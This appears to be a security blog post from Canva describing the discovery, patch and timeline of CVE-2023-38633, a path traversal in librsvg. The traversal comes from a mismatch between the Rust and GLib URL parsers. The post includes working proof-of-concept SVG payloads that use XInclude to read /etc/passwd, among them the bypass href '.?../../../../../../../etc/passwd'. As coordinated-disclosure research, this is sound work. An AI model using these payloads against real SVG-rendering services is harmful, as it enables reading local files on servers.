Security
When URL parsers disagree (CVE-2023-38633)
Discovery and walkthrough of CVE-2023-38633 in librsvg, when two URL parser implementations (Rust and Glib) disagree on file scheme parsing leading to path traversal.
As part of Canva's ongoing mission to build the world's most trusted platform, we continuously evaluate the security of our software dependencies. Identifying and resolving vulnerabilities in third-party dependencies helps improve the security of Canva, as well as the wider internet. Coupled with security controls like sandboxing, we continue to make it increasingly difficult for attackers to reach their objectives by exploiting third-party dependencies.
One such dependency Canva uses is librsvg(opens in a new tab or window) (via libvips(opens in a new tab or window)). We use librsvg to quickly render user-provided SVGs into thumbnails later displayed as PNGs. By exploiting differences in URL parsers when rendering an SVG with librsvg, we showed it's possible to include arbitrary files from disk in the resulting image. The librsvg maintainers quickly patched the issue(opens in a new tab or window) and issued a security vulnerability (CVE-2023-38633(opens in a new tab or window)).
We're sharing this research as another example of the dangers of mixing URL parsers(opens in a new tab or window), especially because the example we discovered is very subtle.
A special thanks to Federico (librsvg maintainer), John (libvips maintainer), and Lovell (Sharp(opens in a new tab or window) maintainer) for their work and excellent coordinated response.
Prequel
The XML Parsing Issues in Inkscape in CLI(opens in a new tab or window) write-up from Elttam's Victor Kahan shows how Inkscape is vulnerable to path traversal when rendering SVGs. Extending Victor's research, we found that while XInclude wasn't directly supported in Inkscape 0.9, it exhibited some interesting behavior when an SVG was nested in another SVG.
For example, consider the following inner SVG.
<?xml version="1.0" encoding="UTF-8" standalone="no" ?><svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude"><rect width="300" height="300" style="fill:rgb(255,204,204);" /><text x="0" y="100"><xi:include href="/etc/passwd" parse="text" encoding="ASCII"><xi:fallback>file not found</xi:fallback></xi:include></text></svg>
We encoded it as a URI and placed it inside another SVG, outer.svg
.
<?xml version="1.0" encoding="UTF-8" standalone="no" ?><svg width="300" height="300" xmlns:xlink="http://www.w3.org/1999/xlink"><imagexlink:href=""/></svg>
When run with Inkscape 0.92.4, it produced an image where the XInclude fallback was triggered.
$ inkscape -f test.svg -e out.png -w 300
The fact that Xinclude was supported at all was surprising because it can often lead to security vulnerabilities. While Inkscape isn't used by the Canva product, digging into the Inkscape code path(opens in a new tab or window) showed that nested images are loaded with GdkPixbuf(opens in a new tab or window), which itself delegates SVG loading to librsvg(opens in a new tab or window). This was of great interest because librsvg is something that Canva does use.
XInclude
XInclude(opens in a new tab or window) is a mechanism for merging XML documents, which can lead to security vulnerabilities when a user-provided XML document (like an SVG) is assembled or rendered on a server.
There are two standout elements in XInclude:
xi:include
to include contents of a referenced URL, such as a file or HTTP request. The content being included can be plaintext or XML.xi:fallback
to nominate content that should be rendered when the referenced content can't be loaded byxi:Include
.
Security checks aside, the following XML document loads the contents of /etc/passwd
when processed.
<?xml version="1.0" encoding="UTF-8" standalone="no" ?><example xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="/etc/passwd" parse="text" encoding="ASCII"><xi:fallback>file not found</xi:fallback></xi:include></example>
There are rules
librsvg is a Rust library to render SVG images to Cairo(opens in a new tab or window) surfaces. Most of the heavy lifting is now implemented in Rust, but the library relies on the Cairo and GNOME glib C libraries.
From the prequel, we knew librsvg supported at least some of the XInclude standards. To understand how much, we dug into its implementation(opens in a new tab or window). As it turns out, every external URL reference in an SVG passes through a single method for validation. This includes references such as:
<image href="file:///something.png" />
<rect filter="url('file-with-filters.svg#my_filter')" />
<xi:include href="/etc/passwd" ... />
The librsvg url_resolver.resolve_href(opens in a new tab or window) method implements some strict security checks(opens in a new tab or window) to restrict what references can be loaded when processing an SVG document:
- All
data:
URLs are permitted because they can't reference external files by design. - The referenced scheme must match the "current document" scheme. For example, when processing
file:///foo/bar/example.svg
, any encountered URL must be of thefile:
scheme. - Encountered files must be in the same directory as the current document, or within a subdirectory of the current document. This is enforced by checking the URL path(opens in a new tab or window).
- All other schemes are rejected, including
http:
.
These strict rules are the reason our earlier naive XInclude tests failed. But we were very interested to see if we could bypass the rules. This could result in path traversal when processing an SVG, for example, being able to include files like /etc/passwd
in the contents of the rendered SVG to PNG.
Parser Mismatch
Resolving a URL within an SVG document has two steps:
- Validate the URL as per the resolve rules mentioned earlier.
- If successful, load the contents(opens in a new tab or window), which parses URLs using Gio(opens in a new tab or window)'s inbuilt URI parser.
Excerpts from mod.rs(opens in a new tab or window) and io.rs(opens in a new tab or window) are as follows.
// xml/mod.rsfn acquire(&self, href: Option<&str>, /* ... */) -> Result<(), AcquireError> {let aurl = self.url_resolver.resolve_href(href) // ...// ...self.acquire_text(&aurl, encoding);}fn acquire_text(&self, aurl: &AllowedUrl, encoding: Option<&str>) -> Result<(), AcquireError> {let binary = io::acquire_data(aurl, None);// ...return result;}// io.rspub fn acquire_data(aurl: &AllowedUrl, /* ... */) -> Result<BinaryData, IoError> {let uri = aurl.as_str();// ...let file = GFile::for_uri(uri);let (contents, _etag) = file.load_contents(cancellable)?;// ...return contents;// ...}
Knowing there were two URL parsers at play (one to validate the URL and one to load the contents), to bypass the security checks, we needed to find URLs where the parsers disagreed.
With some quick tests, we mapped out how the URL parsers process different URLs.
URL file:///etc/passwd?foo=bar#baz | Rust url parsed result |
---|---|
Scheme | file |
Host | None |
Path | /etc/passwd |
Query | foo=bar |
Fragment | baz |
Gio(opens in a new tab or window) doesn't expose generic URL parsing (aside from GUri, which isn't on the callpath). But g_filename_from_uri
returns on some examples.
URL | g_filename_from_uri result |
---|---|
file:///etc/passwd?foo=bar#baz | /etc/passwd?foo=bar#baz Note: As of Glib commit 3986471(opens in a new tab or window), this now fails because of ? and # characters. |
file:///etc/passwd | /etc/passwd |
file:///etc/passwd&hello | /etc/passwd&hello |
file:///etc/passwd@host | /etc/passwd@host |
file://host/etc/passwd | /etc/passwd |
Bypassing Validation
Given this understanding of where the URL parsers were at, we took the relevant parts from librsvg and set up a fuzzing harness ("resolve") to run the same logic as the resolve URL logic when encountering a reference (href, XInclude, etc.) from an on-disk "current.svg" file. This allowed us to quickly test and fuzz inputs to see how the parsers and validation logic were evaluated. Some interesting outputs from fuzzing were as follows:
resolve 'current.svg'
: Passes as expected.resolve run '../../../../../../../etc/passwd'
: Canonicalization fails with 'No such file or directory'.resolve 'current.svg?../../../../../../../etc/passwd'
: Passes.resolve 'none/../current.svg'
: Passes as expected.
The last 2 results showed us that GFile::for_uri
happily resolves path traversals, including path traversals in the query string. However, the second result, ../../../../../../../etc/passwd
, failed because of the canonicalization check.
Bypassing Canonicalization
Part of librsvg's URL validation is to canonicalize the built URL to replace .. and . segments per regular filesystem path rules. It does this using Rust's std::fs::canonicalize(opens in a new tab or window) (calling realpath(opens in a new tab or window)), which throws an error if:
- The path doesn't exist.
- A non-final component in the path isn't a directory.
Because we don't always know the name of the 'current' SVG on disk, we needed to bypass canonicalization if we wanted to have a URL pass librsvg's validation. After some rapid testing, it turns out this is relatively straightforward.
$ realpath current.svg/home/zsims/projects/librsvg-poc/current.svg$ realpath ./home/zsims/projects/librsvg-poc/
As it turns out, realpath(".")
and std::fs::canonicalize(".")
both return the "current directory". We can use this as a placeholder in our PoC instead of current.svg
.
Proof of concept
Knowing how the URL parsers mismatch, and how we can bypass canonicalization without knowing the current file name, we can build a payload to include /etc/passwd
.
.?../../../../../../../etc/passwd
Within a poc.svg
SVG, this looks like the following.
<?xml version="1.0" encoding="UTF-8" standalone="no" ?><svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude"><rect width="300" height="300" style="fill:rgb(255,204,204);" /><text x="0" y="100"><xi:includehref=".?../../../../../../../etc/passwd"parse="text"encoding="ASCII"><xi:fallback>file not found</xi:fallback></xi:include></text></svg>
And produces the following result.
$ rsvg-convert poc.svg > poc.png
We get a similar result when running through vipsthumbnail.
Sensitive files within /proc
, such as /proc/self/environ
, failed because of character encoding.
$ rsvg-convert proc-poc.svg > proc-poc.pngthread 'main' panicked at 'str::ToGlibPtr<*const c_char>: unexpected '' character: NulError(21...
Note that this PoC only works where the SVG is loaded from a file://
. SVGs loaded through data:
or resource:
schemes are not vulnerable.
Patch
Following the report to librsvg's maintainer (see Issue 996(opens in a new tab or window)), Federico patched the issue(opens in a new tab or window) to add improved URL validation and use the validated URL as input into GFile. Part of the response from Federico included a heads-up to maintainers of Sharp and libvips to upgrade before the issue was disclosed publicly as CVE-2023-38633(opens in a new tab or window).
The issue also prompted some discussion about file URL parsing in glib(opens in a new tab or window), resulting in some additional validation(opens in a new tab or window) in the library.
There were a few standouts from discovery and patching:
- The dangers of mixing URL parsers(opens in a new tab or window) are just as applicable to
file://
URLs and in-process use as they are for networked services andhttp://
URLs. file://
URLs are special. For example, the URL specification highlights support for query strings infile://
(opens in a new tab or window) URLs, but the support in the implementations we reviewed varied greatly.- Efforts to migrate existing C code to Rust are not without risk. Although memory safety is much improved, differences in contracts (like URL parsing) can have negative security consequences.
- Make sure you're only parsing URLs once, and using that parsed value from that point onwards.
- If possible, enforce your own validation on files, like SVGs, before processing further. This is the reason MediaWiki(opens in a new tab or window) is not impacted by this issue because
xi:include
elements are rejected before the SVG reaches librsvg.
Timeline
- July 11 2023: Issue discovered.
- July 12 2023: Reported to librsvg maintainers.
- July 19 2023: librsvg maintainers disclose to libraries that depend on librsvg, including libvips(opens in a new tab or window) and Sharp(opens in a new tab or window).
- July 21 2023: librsvg patched by maintainers.
- July 22 2023 - CVE-2023-38633 issued.
Interested in securing Canva systems? Join Us!(opens in a new tab or window)